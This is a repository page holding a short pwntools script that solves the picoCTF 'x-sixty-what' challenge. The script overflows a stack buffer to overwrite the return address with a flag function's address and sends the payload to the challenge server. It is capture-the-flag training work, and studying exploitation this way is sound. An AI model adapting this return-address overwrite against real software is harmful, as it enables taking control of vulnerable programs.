theon-1/picoCTF
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
e23720a07340d666a39cb1279e3c769120d04c46
picoCTF/x-sixty-what/sol.py
THEON-1 fe67eec9c3 x-sixty-what
2025-12-08 13:36:09 +01:00

20 lines
427 B
Python
Executable File
Raw Blame History

#!/usr/bin/env python
from pwn import *
buffer_base = 0x7fffffffcf70
ret_addr = 0x7fffffffcfb8
ret_offset = ret_addr - buffer_base
flag_fun_addr = 0x0000000000401236
flag_fun_offset = 5
target_addr = flag_fun_addr + flag_fun_offset
send_buffer = b"a"*ret_offset + p64(target_addr, 'little')
#conn = process("./vuln")
conn = remote('saturn.picoctf.net', 60832)
conn.recvline()
conn.sendline(send_buffer)
conn.interactive()
Reference in New Issue View Git Blame Copy Permalink